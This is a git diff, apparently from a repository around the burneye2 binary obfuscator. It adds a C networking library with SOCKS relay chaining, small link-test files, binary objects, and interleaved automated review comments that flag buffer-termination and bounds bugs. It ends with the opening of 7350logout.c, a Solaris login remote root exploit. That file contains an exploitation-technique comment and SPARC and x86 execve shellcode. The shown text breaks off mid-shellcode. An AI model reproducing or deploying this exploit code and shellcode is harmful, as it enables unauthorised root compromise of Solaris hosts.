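+ return (-1);
+ recv (s5s, buff, sizeof (buff), 0);
+
+ /* chain us =) */
+ net_write (s5s, "\x05\x01%c\x03%c%s%c%c", 0, strlen (server), server, (port >> 8) & 0xff, port & 0xff);
+ if (net_rtimeout (s5s, sec) == -1)
+ return (-1);
+ n = recv (s5s, buff, sizeof (buff), 0);
+ if (buff[1] != 0x00) {
+ return (-1);
+ }
+ return (1);
+}
+
+
+int
+net_parseip (char *inp, char **ip, unsigned short int *port)
+{
+ int n;
+
+ if (inp == NULL)
+ return (0);
+ if (strchr (inp, ':') == NULL)
+ return (0);
+
+ *ip = calloc (1, 256);
+ if (*ip == NULL)
+ return (0);
+
+ n = sscanf (inp, "%[^:]:%hu", *ip, port);
+ if (n != 2)
+ return (0);
+
+ *ip = realloc (*ip, strlen (*ip) + 1);
+ if (*ip == NULL || (*port < 1 || *port > 65535))
+ return (0);
+
+ return (1);
+}
+
+
+char *
+net_getlocalip (void)
+{
+ struct sockaddr_in pf;
+ char name[255];
+
+ memset (name, '\0', sizeof (name));
+
+ if (gethostname (name, sizeof (name) - 1) == -1) {
+ return (NULL);
+ }
+
+ pf.sin_addr.s_addr = net_resolve (name);
+
+ return (strdup (inet_ntoa (pf.sin_addr)));;
+}
+
+
+char *
+net_peeraddress (int socket)
+{
+ char * hip;
+ struct sockaddr_in peeraddr;
+ size_t size = sizeof (struct sockaddr_in);
+
+ if (getpeername (socket, (struct sockaddr *) &peeraddr, &size) == -1)
+ return (NULL);
+
+ net_printipa (&peeraddr.sin_addr, &hip);
+
+ return (hip);
+}
+
+
+FILE *
+net_descriptify (int socket)
+{
+ FILE *fp;
+
+ fp = fdopen (socket, "r+");
+ return ((fp == NULL) ? (NULL) : (fp));
+}
+
+
+/* loosely based on rfc931.c */
+
+int
+net_ident (char **ident, struct sockaddr_in *locals, unsigned short int localport,
+ struct sockaddr_in *remotes, unsigned short int remoteport)
+{
+ int is; /* ident socket */
+ struct sockaddr_in isa;
+ int n;
+ char identreply[512], *cp;
+ unsigned int rmt_port, our_port;
+
+
+ *ident = NULL;
+
+ is = net_connect (&isa, inet_ntoa (remotes->sin_addr), 113, NULL, 0, net_identtimeout);
+ if (is == -1)
+ return (-1);
+
+ /* ident request */
+ net_write (is, "%u,%u\r\n", remoteport, localport);
+ memset (identreply, '\0', sizeof (identreply));
+
+ n = net_rlinet (is, identreply, sizeof(identreply) -1, net_identtimeout);
+ if (n == -1) {
+ close (is);
+ return (-1);
+ }
+ close (is);
+
+ *ident = calloc (1, 256);
+#ifdef DEBUG
+ printf("%s\n", identreply);
+#endif
+ n = sscanf (identreply, "%u , %u : USERID :%*[^:]:%255s", &rmt_port, &our_port, *ident);
+ if (n != 3) {
+ free (*ident);
+ *ident = NULL;
+ return (-1);
+ }
+
+ /* check the ports 'man */
+ if ((rmt_port != remoteport) || (our_port != localport)) {
+ free (*ident);
+ *ident = NULL;
+ return (-1);
+ }
+
+ /* strip character and save some memory */
+ if ((cp = strchr (*ident, '\r')))
+ *cp = '\0';
+ n = strlen (*ident);
+ *ident = realloc (*ident, n + 1);
+ (*ident)[n] = '\0';
+
+#ifdef DEBUG
+ printf("ident-return: %s\n", *ident);
+#endif
+ return (1);
+}
+
+
+int
+net_accept (int s, struct sockaddr_in *cs, int maxsec)
+{
+ int flags, n;
+ fd_set ac_s;
+ int len;
+ struct timeval tval;
+
+ flags = fcntl(s, F_GETFL, 0);
+ if (flags == -1)
+ return (-1);
+ n = fcntl(s, F_SETFL, flags | O_NONBLOCK);
+ if (n == -1)
+ return (-1);
+
+ FD_ZERO(&ac_s);
+ FD_SET(s, &ac_s);
+ tval.tv_sec = maxsec;
+ tval.tv_usec = 0;
+
+ n = select(s + 1, &ac_s, NULL, NULL, maxsec ? &tval : NULL);
+ if (n == 0)
+ return (0);
+
+ if (FD_ISSET(s, &ac_s)) {
+ len = sizeof(struct sockaddr_in);
+ n = accept(s, (struct sockaddr *) cs, &len);
+ if (n == -1) {
+ switch (errno) {
+ case EWOULDBLOCK:
+ case ECONNABORTED:
+ case EINTR: if (fcntl(s, F_SETFL, flags) == -1)
+ return (-1);
+ return (0);
+ default: return (-1);
+ }
+ }
+ if (fcntl(s, F_SETFL, flags) == -1)
+ return (-1);
+ return (n);
+ }
+ if (fcntl(s, F_SETFL, flags) == -1)
+ return (-1);
+ return (0);
+}
+
+
+void
+net_boundfree (bound *bf)
+{
+ close (bf->bs);
+ free (bf);
+ return;
+}
+
+
+bound *
+net_bind (char *ip, unsigned short int port)
+{
+ bound *b;
+ int br, gsnr, lr;
+ int len, reusetmp;
+ struct sockaddr_in *sap;
+
+ if (port >= 65536)
+ return (NULL);
+
+ b = calloc(1, sizeof (bound));
+ if (b == NULL)
+ return (NULL);
+ b->bs = socket (AF_INET, SOCK_STREAM, 0);
+ if (b->bs == -1)
+ goto berror;
+
+ reusetmp = 1;
+#ifdef SO_REUSEPORT
+ if (setsockopt (b->bs, SOL_SOCKET, SO_REUSEPORT, &reusetmp, sizeof (reusetmp)) == -1)
+ goto berror;
+#else
+ if (setsockopt (b->bs, SOL_SOCKET, SO_REUSEADDR, &reusetmp, sizeof (reusetmp)) == -1)
+ goto berror;
+#endif
+
+ sap = (struct sockaddr_in *) &b->bsa;
+ sap->sin_family = AF_INET;
+ sap->sin_port = htons (port); /* 0 = ephemeral */
+
+ if (ip != NULL) {
+ if (strcmp (ip, "*") == 0) {
+ sap->sin_addr.s_addr = htonl (INADDR_ANY);
+ } else {
+ if (!(sap->sin_addr.s_addr = net_resolve (ip))) {
+ goto berror;
+ }
+ }
+ } else {
+ sap->sin_addr.s_addr = htonl (INADDR_ANY);
+ }
+
+ br = bind (b->bs, (struct sockaddr *) &b->bsa, sizeof (struct sockaddr));
+ if (br == -1)
+ goto berror;
+
+ len = sizeof (struct sockaddr);
+ gsnr = getsockname (b->bs, (struct sockaddr *) &b->bsa, &len);
+ b->port = ntohs (sap->sin_port);
+ if (gsnr == -1)
+ goto berror;
+
+ lr = listen (b->bs, 16);
+ if (lr == -1) {
+ goto berror;
+ }
+ return (b);
+
+berror:
+ free (b);
+
+ return(NULL);
+}
+
+
+unsigned long int
+net_resolve (char *host)
+{
+ long i;
+ struct hostent *he;
+
+ i = inet_addr(host);
+ if (i == -1) {
+ he = gethostbyname(host);
+ if (he == NULL) {
+ return (0);
+ } else {
+ return (*(unsigned long *) he->h_addr);
+ }
+ }
+ return (i);
+}
+
+
+int
+net_assignaddr (int sd, char *sourceip, unsigned short int sourceport)
+{
+ struct sockaddr_in sourcedef;
+
+ if (sourceip && strcmp (sourceip, "*") == 0)
+ sourceip = NULL;
+
+ if (sourceip == NULL && sourceport == 0)
+ return (1);
+
+ memset (&sourcedef, '\0', sizeof (struct sockaddr_in));
+
+ /* if sourceip is specified, set it */
+ if (sourceip) {
+ sourcedef.sin_addr.s_addr = net_resolve (sourceip);
+ } else {
+ sourcedef.sin_addr.s_addr = htonl (INADDR_ANY);
+ }
+ if (sourceport)
+ sourcedef.sin_port = htons (sourceport);
+
+ /* now set the source on the socket by binding it */
+ if (bind (sd, (struct sockaddr *) &sourcedef, sizeof (struct sockaddr_in)) == -1) {
+ return (0);
+ }
+
+ return (1);
+}
+
+
+int
+net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, char *sourceip,
+ unsigned short int sourceport, int sec)
+{
+ int n,
+ len,
+ error,
+ flags;
+ int fd;
+ struct timeval tv;
+ fd_set rset, wset;
+ struct sockaddr_in csa;
+
+ if (cs == NULL)
+ cs = &csa;
+
+ /* first allocate a socket */
+ cs->sin_family = AF_INET;
+ cs->sin_port = htons (port);
+ fd = socket (cs->sin_family, SOCK_STREAM, 0);
+ if (fd == -1)
+ return (-1);
+
+ /* check wether we should change the defaults */
+ if (net_assignaddr (fd, sourceip, sourceport) == 0) {
+ close (fd);
+ return (-1);
+ }
+
+ if (!(cs->sin_addr.s_addr = net_resolve (server))) {
+ close (fd);
+ return (-1);
+ }
+
+ flags = fcntl (fd, F_GETFL, 0);
+ if (flags == -1) {
+ close (fd);
+ return (-1);
+ }
+ n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
+ if (n == -1) {
+ close (fd);
+ return (-1);
+ }
+
+ error = 0;
+
+ n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
+ if (n < 0) {
+ if (errno != EINPROGRESS) {
+ close (fd);
+ return (-1);
+ }
+ }
+ if (n == 0)
+ goto done;
+
+ FD_ZERO(&rset);
+ FD_ZERO(&wset);
+ FD_SET(fd, &rset);
+ FD_SET(fd, &wset);
+ tv.tv_sec = sec;
+ tv.tv_usec = 0;
+
+ n = select(fd + 1, &rset, &wset, NULL, &tv);
+ if (n == 0) {
+ close(fd);
+ errno = ETIMEDOUT;
+ return (-1);
+ }
+ if (n == -1)
+ return (-1);
+
+ if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
+ if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
+ len = sizeof(error);
+ if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
+ errno = ETIMEDOUT;
+ return (-1);
+ }
+ if (error == 0) {
+ goto done;
+ } else {
+ errno = error;
+ return (-1);
+ }
+ }
+ } else
+ return (-1);
+
+done:
+ n = fcntl(fd, F_SETFL, flags);
+ if (n == -1)
+ return (-1);
+ return (fd);
+}
+
+
+int
+net_tline (char *buf, int bufsize)
+{
+ int p;
+
+ for (p = 0; p < bufsize; p++) {
+ if (buf[p] == '\n')
+ return (p + 1);
+ }
+ return (-1);
+}
+
+#define LINET_A 1024
+
+
+int
+net_rlineta (int fd, char **buf, int sec)
+{
+ int n; /* return value */
+ int bufsize = 0;
+
+ *buf = NULL;
+
+ do {
+ bufsize += LINET_A;
+ *buf = realloc (*buf, bufsize);
+ if (*buf == NULL)
+ return (-1);
+
+ n = net_rlinet (fd, *buf + bufsize - LINET_A, LINET_A, sec);
+
+ if (n == -1)
+ goto rlinetaerr;
+ if (n >= 0)
+ goto rlinetastrip;
+ } while (n == -2);
+
+rlinetastrip:
+ *buf = realloc (*buf, strlen (*buf) + 1);
+ return (strlen (*buf));
+
+rlinetaerr:
+ free (*buf);
+ return (-1);
+}
+
+
+int
+net_rlinet (int fd, char *buf, int bufsize, int sec)
+{
+ int n;
+ unsigned long int rb = 0;
+ struct timeval tv_start, tv_cur;
+
+ memset(buf, '\0', bufsize);
+ (void) gettimeofday(&tv_start, NULL);
+
+ do {
+ (void) gettimeofday(&tv_cur, NULL);
+ if (sec > 0) {
+ if ((((tv_cur.tv_sec * 1000000) + (tv_cur.tv_usec)) -
+ ((tv_start.tv_sec * 1000000) + (tv_start.tv_usec))) > (sec * 1000000)) {
+ return (-1);
+ }
+ }
+ n = net_rtimeout(fd, net_readtimeout);
+ if (n <= 0) {
+ return (-1);
+ }
+ n = read(fd, buf, 1);
+ if (n <= 0) {
+ return (n);
+ }
+ rb++;
+ if (*buf == '\n')
+ return (rb);
+ buf++;
+ if (rb >= bufsize)
+ return (-2); /* buffer full */
+ } while (1);
+}
+
+
+long int
+net_rbuf (int fd, char **dst)
+{
+ long int ml = 0;
+ long int read_bytes;
+ int p;
+
+ *dst = NULL;
+
+ while ((p = net_rtimeout(fd, net_readtimeout)) == 1) {
+ *dst = (char *) realloc(*dst, ml + NET_BSIZE);
+ if (*dst == NULL)
+ return (-1);
+ ml += read_bytes = read(fd, *dst + ml, NET_BSIZE);
+ if (read_bytes == 0) {
+ *dst = (char *) realloc(*dst, ml);
+ if ((*dst == NULL) && (ml == 0)) {
+ return (1);
+ } else if (*dst == NULL) {
+ return (-1);
+ } else {
+ return (ml);
+ }
+ }
+ }
+ return (-1);
+}
+
+
+int
+net_rbuft (int fd, char *dst, unsigned long int dsize)
+{
+ unsigned long int bl = 0, m;
+ int p;
+
+ while (bl < dsize) {
+ p = net_rtimeout(fd, net_readtimeout);
+ if ((p == 0) || (p == -1)) {
+ return (-1);
+ }
+
+ m = read(fd, dst + bl, (dsize - bl));
+ if ((m == 0) || (m == -1)) {
+ return (-1);
+ }
+ bl += m;
+ }
+ return (1);
+}
+
+
+int
+net_rtimeout (int fd, int sec)
+{
+ fd_set rset;
+ struct timeval tv;
+ int n, error, flags;
+
+ error = 0;
+ flags = fcntl(fd, F_GETFL, 0);
+ n = fcntl(fd, F_SETFL, flags | O_NONBLOCK);
+ if (n == -1)
+ return (-1);
+
+ FD_ZERO(&rset);
+ FD_SET(fd, &rset);
+ tv.tv_sec = sec;
+ tv.tv_usec = 0;
+
+ /* now we wait until more data is received then the tcp low level watermark,
+ * which should be setted to 1 in this case (1 is default)
+ */
+
+ n = select(fd + 1, &rset, NULL, NULL, &tv);
+ if (n == 0) {
+ n = fcntl(fd, F_SETFL, flags);
+ if (n == -1)
+ return (-1);
+ errno = ETIMEDOUT;
+ return (-1);
+ }
+ if (n == -1) {
+ return (-1);
+ }
+ /* socket readable ? */
+ if (FD_ISSET(fd, &rset)) {
+ n = fcntl(fd, F_SETFL, flags);
+ if (n == -1)
+ return (-1);
+ return (1);
+ } else {
+ n = fcntl(fd, F_SETFL, flags);
+ if (n == -1)
+ return (-1);
+ errno = ETIMEDOUT;
+ return (-1);
+ }
+}
+
+
+void
+net_write (int fd, const char *str, ...)
+{
+ char tmp[1025];
+ va_list vl;
+ int i;
+
+ va_start(vl, str);
+ memset(tmp, 0, sizeof(tmp));
+ i = vsnprintf(tmp, sizeof(tmp), str, vl);
+ va_end(vl);
+
+#ifdef DEBUG
+ printf("[snd] %s\n", tmp);
+#endif
+
+ send(fd, tmp, i, 0);
+ return;
+}
+
+
+int
+net_printip (struct in_addr *ia, char *str, size_t len)
+{
+ unsigned char *ipp;
+
+ ipp = (unsigned char *) &ia->s_addr;
+ snprintf (str, len - 1, "%d.%d.%d.%d", ipp[0], ipp[1], ipp[2], ipp[3]);
+
+ return (0);
+}
+
+
+int
+net_printipa (struct in_addr *ia, char **str)
+{
+ unsigned char *ipp;
+
+ ipp = (unsigned char *) &ia->s_addr;
+ *str = calloc (1, 256);
+ if (*str == NULL)
+ return (1);
+
+ snprintf (*str, 255, "%d.%d.%d.%d", ipp[0], ipp[1], ipp[2], ipp[3]);
+ *str = realloc (*str, strlen (*str) + 1);
+
+ return ((*str == NULL) ? 1 : 0);
+}
+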
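Review bot: `net_rlineta` calls `strlen (*buf)` on a buffer that is not guaranteed to be NUL-terminated: `net_rlinet` returns the byte count as soon as it stores `'\n'`, and when that newline is the last byte of a `LINET_A` chunk nothing terminates the allocation, so the length scan runs past the heap block on data the remote end supplies. Allocating one extra byte and terminating after each read closes this, with `*buf = realloc (*buf, bufsize + 1);` and then `(*buf)[bufsize] = '\0';` after the `net_rlinet` call; a cap on `bufsize` would also stop a peer that never sends a newline from growing the buffer without limit, and `*buf = NULL;` after `free (*buf)` at `rlinetaerr` keeps callers from reusing the pointer. Two related bounds problems sit in the same file: `net_parseip` scans with an unbounded `%[^:]` into a 256-byte `calloc` (use `%255[^:]`), and `net_write` passes the `vsnprintf` return value straight to `send`, which exceeds `sizeof (tmp)` when the output was truncated and is negative on error. `net_connect` also returns -1 without `close (fd)` on several paths after `select`.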
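--- /dev/null
+++ b/other/burneye2/tmp/ldistfp/network.h
@@ -0,0 +1,287 @@
+/* scut's leet network library ;)
+ * 1999 (c) scut
+ *
+ * networking code
+ */
+
+#ifndef SCUT_NETWORK_H
+#define SCUT_NETWORK_H
+
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <stdio.h>
+
+#define NET_READTIMEOUT 180
+#define NET_CONNTIMEOUT 60
+#define NET_IDENTTIMEOUT 15
+
+
+typedef struct bound {
+ int bs; /* bound socket */
+ unsigned short port; /* port we bound to */
+ struct sockaddr bsa; /* bs_in */
+} bound;
+
+extern int net_readtimeout;
+extern int net_conntimeout;
+extern int net_identtimeout;
+
+
+/* net_socks_connect
+ *
+ * relays through an open socks 5 server (NO AUTH type)
+ * returns a socket descriptor which is already connected
+ */
+
+int net_socks_connect (char *socks, unsigned short int sport,
+ char *server, unsigned short int port, int sec);
+
+
+/* net_socks_put_s5info
+ *
+ * insert socks 5 compatible relay information into socket s5s,
+ * used to relay over more then just one socks server
+ */
+
+int net_socks_put_s5info (int s5s, char *server,
+ unsigned short int port, int sec);
+
+
+/* net_parseip
+ *
+ * read an ip in the format "1.1.1.1:299" or "blabla:481" into
+ * the char pointer *ip and into the port *port
+ *
+ * return 0 on failure
+ * return 1 on success
+ */
+
+int net_parseip (char *inp, char **ip, unsigned short int *port);
+
+
+/* net_getlocalip
+ *
+ * give back the main IP of the local machine
+ *
+ * return the local IP address as string on success
+ * return NULL on failure
+ */
+
+char *net_getlocalip (void);
+
+
+/* net_peeraddress
+ *
+ * return a pointer to a string representation of the remote IP address of
+ * the already connected socket `socket'
+ *
+ * return NULL on failure
+ * return string pointer on succes
+ */
+
+char * net_peeraddress (int socket);
+
+
+/* net_descriptify
+ *
+ * descriptify a socket `socket' ;)
+ *
+ * return -1 on failure
+ * return file descriptor on success
+ */
+
+FILE *net_descriptify (int socket);
+
+
+/* net_ident
+ *
+ * ident a connection identified by the host:port pairs on both sides,
+ * returning the ident in *ident
+ *
+ * return 1 on success
+ * return -1 on failure
+ */
+
+int net_ident (char **ident, struct sockaddr_in *locals, unsigned short int localport,
+ struct sockaddr_in *remotes, unsigned short int remoteport);
+
+
+/* net_accept
+ *
+ * accept a connection from socket s, and stores the connection
+ * into cs.
+ * wait a maximum amount of maxsec seconds for connections
+ * maxsec can also be zero (infinite wait, until connection)
+ *
+ * return 0 if no connection has been made within maxsec seconds
+ * return -1 if an error appears
+ * return the socket number if a connection has been made
+ */
+
+int net_accept (int s, struct sockaddr_in *cs, int maxsec);
+
+
+/* net_bind
+ *
+ * bind a socket to an ip:port on the local machine,
+ * `ip' can be either NULL (bind to all IP's on the host), or a pointer
+ * to a virtual host name, or a real IP, or "*" for any.
+ * `port' can be either 0 (ephemeral port), or any free port.
+ *
+ * return NULL on failure
+ * return pointer to bound structure on success
+ */
+
+bound *net_bind (char *ip, unsigned short int port);
+
+
+/* net_boundfree
+ *
+ * free the bound structure pointed to by `bf'
+ *
+ * return in any case
+ */
+
+void net_boundfree (bound *bf);
+
+
+/* net_resolve
+ *
+ * resolve a hostname pointed to by `host' into a s_addr return value
+ *
+ * return the correct formatted `s_addr' for this host on success
+ * return 0 on failure
+ */
+
+unsigned long int net_resolve (char *host);
+
+
+/* net_assignaddr
+ *
+ * assign an IP address and port to a socket
+ * sourceip can be an IP or hostname that is available on the local host,
+ * or NULL/"*" to let the kernel choose one, same applies to sourceport,
+ * it can either be zero (ephemeral port choosen by the kernel) or a
+ * valid port number
+ *
+ * return 1 on success
+ * return 0 on failure
+ */
+
+int net_assignaddr (int sd, char *sourceip, unsigned short int sourceport);
+
+
+/* net_connect
+ *
+ * connect to the given `server' and `port' with a max timeout of `sec'.
+ * initialize the sockaddr_in struct `cs' correctly (ipv4), accept any
+ * ip "123.123.123.123" or hostname "localhost", "www.yahoo.de" as hostname.
+ * create a new socket and return either -1 if failed or
+ * the connected socket if connection has been established within the
+ * timeout limit.
+ *
+ * the routine is still IPv4 biased :-/
+ * with `sourceip'/`sourceportÄ you MAY specify the source IP and source port
+ * to use for the connection, but you can set the ip or port to NULL/0,
+ * to choose the default IP and an ephemeral port. this was added later in
+ * this library, so please update your sources.
+ *
+ * return -1 on failure
+ * return socket if success
+ */
+
+int net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, char *sourceip,
+ unsigned short int sourceport, int sec);
+
+
+/* net_rtimeout
+ *
+ * waits max `sec' seconds for fd to become readable
+ *
+ * return -1 on error (errno set)
+ * return 1 on readability
+ */
+
+int net_rtimeout (int fd, int sec);
+
+
+/* net_rbuf
+ *
+ * allocate memory and read socket data to `dst' until the connection
+ * gets closed.
+ *
+ * return n if success (n = number of bytes read)
+ * return -1 if failed
+ */
+
+long int net_rbuf (int fd, char **dst);
+#define NET_BSIZE 4096 /* blocksize for pre-allocation */
+
+
+/* net_rbuft
+ *
+ * read `dsize' bytes into `dst' from `fd', with timeout
+ *
+ * return 1 on success
+ * return -1 on failure
+ */
+int net_rbuft (int fd, char *dst, unsigned long int dsize);
+
+
+/* net_rlinet
+ *
+ * read a line from socket descriptor with timeout to buffer
+ * if sec = 0, then only a continuous stream of data is required, not
+ * an overall timeout.
+ *
+ * return -1 on timeout
+ * return 0 on connection close
+ * return length of readen line (including '\n')
+ *
+ * net_rlineta
+ * same as net_rlinet, but allocs the memory itself
+ */
+
+int net_rlineta (int fd, char **buf, int sec);
+int net_rlinet (int fd, char *buf, int bufsize, int sec);
+
+
+/* net_tline
+ *
+ * return length if string `buf' with a maximum length of `bufsize'
+ * contains '\n'
+ *
+ * return -1 if no '\n' in string
+ */
+
+int net_tline (char *buf, int bufsize);
+
+
+/* net_write
+ *
+ * print a formatted string to a socket, see syntax of printf
+ *
+ * return in any case
+ */
+
+void net_write (int fd, const char *str, ...);
+
+
+/* net_printip
+ *
+ * print an IP address stored in the struct in_addr pointed to by `ia' to a
+ * string `str' with a maximum length of `len'.
+ *
+ * return 0 on success
+ * return 1 on failure
+ *
+ * net_printipa behaves the same way, except it allocates memory and let
+ * `*str' point to the string
+ */
+
+int net_printip (struct in_addr *ia, char *str, size_t len);
+int net_printipa (struct in_addr *ia, char **str);
+
+
+#endif
+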
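Review bot: The comment block for `net_rlinet` omits the `-2` return that network.c uses for "buffer full", and does not say that the buffer carries no terminating NUL once `bufsize` bytes have been stored; `net_rlineta` depends on both. I would add `return -2 if bufsize bytes were read without a '\n' (buf is then not NUL-terminated)` to that block so callers know to terminate the buffer themselves. The `net_descriptify` comment says it returns -1 or a file descriptor, but the prototype returns `FILE *`, so it should read `return NULL on failure` and `return FILE pointer on success`. `net_printip` is documented to return 1 on failure, which the implementation in this commit never does.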
diff --git a/other/burneye2/tmp/ldistfp/network.o b/other/burneye2/tmp/ldistfp/network.o
new file mode 100644
index 0000000..f43afc8
--- /dev/null
+++ b/other/burneye2/tmp/ldistfp/network.o
Binary files differ
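diff --git a/other/burneye2/tmp/linktest/Makefile b/other/burneye2/tmp/linktest/Makefile
new file mode 100644
index 0000000..7aadd4b
--- /dev/null
+++ b/other/burneye2/tmp/linktest/Makefile
@@ -0,0 +1,21 @@
+
+CC=gcc
+CFLAGS=-Os -nostdlib
+
+# 1. order of start.o important, -L/-l does not matter
+LIBS=obj-dietstart/start.o -L/usr/lib/diet/lib-i386 -lc -L/usr/lib/gcc-lib/i386-linux/2.95.4 -lgcc
+
+all: hello
+
+clean:
+ rm -f hello *.o
+
+hello: hello-final.o
+ ld -o hello hello-final.o
+
+# hello-final.o is what we need as burneye input
+hello-final.o: hello.o
+ ld -r -o hello-final.o hello.o $(LIBS)
+
+hello.o: hello.c
+ $(CC) $(CFLAGS) -c -o hello.o hello.c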
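Review bot: `all` and `clean` are not declared phony, so a file named `all` or `clean` in the directory would stop make from running them; add `.PHONY: all clean` above the `all:` rule. The same applies to other/burneye2/tmp/logout/Makefile and other/burneye2/tmp/switchtab/Makefile in this commit, where in addition the prerequisite of `all` (`7350logout`, `switch`) is never created as a file, so those recipes re-run on every invocation. The `LIBS` line also hard-codes /usr/lib/gcc-lib/i386-linux/2.95.4; putting that directory in its own variable would record in one place which toolchain the link was tested with.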
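diff --git a/other/burneye2/tmp/linktest/dummy.c b/other/burneye2/tmp/linktest/dummy.c
new file mode 100644
index 0000000..9dbdb38
--- /dev/null
+++ b/other/burneye2/tmp/linktest/dummy.c
@@ -0,0 +1,6 @@
+
+int
+__write (void)
+{
+}
+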
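Review bot: `__write` is declared to return `int` but its body is empty, so a caller that uses the result reads an indeterminate value, which is undefined behaviour; the stub should end with `return (0);`. `__write` is also an implementation-reserved name and nothing in the file says why it is defined here, so a one-line comment naming the unresolved symbol this stub is meant to satisfy would help. The linktest Makefile added in the same commit does not build dummy.c, so it is unclear from the page whether the file is still used.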
diff --git a/other/burneye2/tmp/linktest/hello-final.o b/other/burneye2/tmp/linktest/hello-final.o
new file mode 100644
index 0000000..3714f27
--- /dev/null
+++ b/other/burneye2/tmp/linktest/hello-final.o
Binary files differ
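diff --git a/other/burneye2/tmp/linktest/hello.c b/other/burneye2/tmp/linktest/hello.c
new file mode 100644
index 0000000..9ff86fd
--- /dev/null
+++ b/other/burneye2/tmp/linktest/hello.c
@@ -0,0 +1,13 @@
+
+#include <stdio.h>
+
+
+int
+main (int argc, char *argv[])
+{
+ printf ("hello world\n");
+
+ return (0);
+}
+
+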
diff --git a/other/burneye2/tmp/linktest/hello.o b/other/burneye2/tmp/linktest/hello.o
new file mode 100644
index 0000000..04cf1eb
--- /dev/null
+++ b/other/burneye2/tmp/linktest/hello.o
Binary files differ
diff --git a/other/burneye2/tmp/linktest/obj-dietstart/start.o b/other/burneye2/tmp/linktest/obj-dietstart/start.o
new file mode 100644
index 0000000..2e10da1
--- /dev/null
+++ b/other/burneye2/tmp/linktest/obj-dietstart/start.o
Binary files differ
diff --git a/other/burneye2/tmp/logout/7350logout-dietlibc b/other/burneye2/tmp/logout/7350logout-dietlibc
new file mode 100644
index 0000000..a37f1ca
--- /dev/null
+++ b/other/burneye2/tmp/logout/7350logout-dietlibc
Binary files differ
diff --git a/other/burneye2/tmp/logout/7350logout-final-dietlibc.o b/other/burneye2/tmp/logout/7350logout-final-dietlibc.o
new file mode 100644
index 0000000..6eadaf7
--- /dev/null
+++ b/other/burneye2/tmp/logout/7350logout-final-dietlibc.o
Binary files differ
diff --git a/other/burneye2/tmp/logout/7350logout-final-glibc.o b/other/burneye2/tmp/logout/7350logout-final-glibc.o
new file mode 100644
index 0000000..72006e5
--- /dev/null
+++ b/other/burneye2/tmp/logout/7350logout-final-glibc.o
Binary files differ
diff --git a/other/burneye2/tmp/logout/7350logout-glibc b/other/burneye2/tmp/logout/7350logout-glibc
new file mode 100644
index 0000000..7c41cc8
--- /dev/null
+++ b/other/burneye2/tmp/logout/7350logout-glibc
Binary files differ
diff --git a/other/burneye2/tmp/logout/7350logout.c b/other/burneye2/tmp/logout/7350logout.c
new file mode 100644
index 0000000..4a14180
--- /dev/null
+++ b/other/burneye2/tmp/logout/7350logout.c
@@ -0,0 +1,1189 @@
1/* 7350logout - sparc|x86/solaris login remote root exploit
2 *
3 * TESO CONFIDENTIAL - SOURCE MATERIALS
4 *
5 * This is unpublished proprietary source code of TESO Security.
6 *
7 * The contents of these coded instructions, statements and computer
8 * programs may not be disclosed to third parties, copied or duplicated in
9 * any form, in whole or in part, without the prior written permission of
10 * TESO Security. This includes especially the Bugtraq mailing list, the
11 * www.hack.co.za website and any public exploit archive.
12 *
13 * The distribution restrictions cover the entire file, including this
14 * header notice. (This means, you are not allowed to reproduce the header).
15 *
16 * (C) COPYRIGHT TESO Security, 2001
17 * All Rights Reserved
18 *
19 *****************************************************************************
20 * 2001/12/19 -scut
21 *
22 * offsetless version (what a brainblasting mess).
23 *
24 * XXX: timing seems to be somewhat relevant, since telnetd does not cleanly
25 * flush anything to login, so we have to sleep a while. should work.
26 *
27 * on sol: cc -o 7 7.c -lnsl -lsocket
28 */
29
30#define VERSION "0.7.2"
31
32#include <sys/types.h>
33#include <sys/time.h>
34#include <sys/socket.h>
35#include <netinet/in.h>
36#include <arpa/inet.h>
37#include <arpa/telnet.h>
38#include <netdb.h>
39#include <fcntl.h>
40#include <errno.h>
41#include <unistd.h>
42#include <stdio.h>
43#include <stdlib.h>
44#include <string.h>
45
46
47/* ok, here are the guts of our PAM power technique ;)
48 *
49 * 1. we expect this memory layout in the static .bss space:
50 * [envbuf] 0x800 environment string buffer
51 * [args] 63 * 0x04 environment pointer buffer
52 * [pamh] 0x4 pam_handle pointer
53 *
54 * thats all. yes.
55 *
56 * offsetless through triple-overlapping pam_handle struct
57 * TODO: write more in-depth blarf
58 */
59
60typedef struct {
61 char * desc; /* distribution */
62 unsigned long int args; /* &args[0] buffer address */
63
64 int endianess; /* 0 = big, 1 = little */
65
66 unsigned char * shellcode;
67 unsigned int shellcode_len;
68 unsigned char * shellcode_nop; /* 4 byte nops */
69} tgt_type;
70
71
72/* 48 byte sparc/solaris pic execve shellcode, lsd-pl.net, thanks!
73 */
74unsigned char sparc_solaris_execve[] =
75 "\x20\xbf\xff\xff" /* bn,a <shellcode-4> */
76 "\x20\xbf\xff\xff" /* bn,a <shellcode> */
77 "\x7f\xff\xff\xff" /* call <shellcode+4> */
78 "\x90\x03\xe0\x20" /* add %o7,32,%o0 */
79 "\x92\x02\x20\x10" /* add %o0,16,%o1 */
80 "\xc0\x22\x20\x08" /* st %g0,[%o0+8] */
81 "\xd0\x22\x20\x10" /* st %o0,[%o0+16] */
82 "\xc0\x22\x20\x14" /* st %g0,[%o0+20] */
83 "\x82\x10\x20\x0b" /* mov 0x0b,%g1 */
84 "\x91\xd0\x20\x08" /* ta 8 */
85 "/bin/ksh";
86
87unsigned char sparc_nop[] =
88 "\x90\x1b\x80\x0e"; /* xor %sp, %sp, %o0 */
89
90
91/* 42 byte x86/solaris execve shellcode
92 * unknown author (kudos to him ! :)
93 */
94unsigned char x86_solaris_execve[] =
95 "\xeb\x1b" /* jmp */
96 "\x33\xd2" /* xorl %edx,%edx */
97 "\x58" /* popl %eax */
98 "\x8d\x78\x14" /* leal 0x14(%eax),edi */
99 "\x52" /* pushl %edx */
100 "\x57" /* pushl %edi */
101 "\x50" /* pushl %eax */
102 "\xab" /* stosl %eax,%es:(%edi) */
103 "\x92" /* xchgl %eax,%edx */
104 "\xab" /* stosl %eax,%es:(%edi) */
105 "\x88\x42\x08" /* movb %al,0x8(%edx) */
106 "\x83\xef\x3c" /* subl $0x3c,%edi */
107 "\xb0\x9a" /* movb $0x9a,%al */
108 "\xab" /* stosl %eax,%es:(%edi) */
